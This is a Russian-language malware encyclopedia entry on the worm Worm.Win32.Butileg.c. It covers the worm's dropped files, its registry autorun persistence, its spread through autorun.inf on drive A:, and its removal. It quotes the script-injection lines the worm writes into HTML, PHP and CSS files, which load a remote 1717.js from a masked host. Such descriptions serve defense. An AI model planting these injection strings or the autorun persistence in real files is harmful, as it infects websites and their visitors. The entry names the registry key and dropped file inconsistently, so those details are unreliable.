Worm.Win32.Butileg.c
Материал из Total Malware Info
Worm.Win32.Butileg.c Троянская программа, похищающая пароли пользователя. Является приложением Windows (PE-EXE файл). Имеет размер 11776 байт.
Содержание |
Инсталляция
Извлекает из своего тела файл и запускает его:
%Program Files%\Common Files\System\MSOSVERT.EXE
данный файл имеет размер 3072 байт. Копирует свой исполняемый файл как:
%WinDir%\svchost.exe
Для автоматического запуска при следующем старте системы червь добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKCR\Software\Microsoft\Windows\CurrentVersion\Run] rundll32=%Program Files%\Common Files\System\MSOSV.EXE
Распространение
Копирует свой исполняемый файл в корень съемного диска “А:” с именем:
A:\game.exe
Так же вместе со своим исполняемым файлом червь помещает в корень раздела сопровождающий файл:
A:\autorun.inf
который запускает исполняемый файл червя, каждый раз, когда пользователь открывает зараженный раздел при помощи программы ”Проводник”.
Деструктивная активность
Производит поиск файлов со следующими расширениями на диске A:\
.CSS .HTML .ASPX .HTM .PHP .JSP .ASP
и вставляет в их тело следующие строки:
<script language=javascript src=http://www.******.com/1717.js></script>
body{background-image: url('javascript:document.write("<script src=http://www.******.com/1717.js></script>")')}
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- При помощи <Диспетчера задач> завершить вредоносный процесс.
- Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить параметр в ключе системного реестра:
- Удалить файлы:
- Удалить следующие файлы со всех флоппи дисков:
[HKCR\Software\Microsoft\Windows\CurrentVersion\Run] rundll32=%Program Files%\Common Files\System\MSOSV.EXE
%WinDir%\svchost.exe %Program Files%\Common Files\System\MSOSVERT.EXE
A:\game.exe A:\autorun.inf
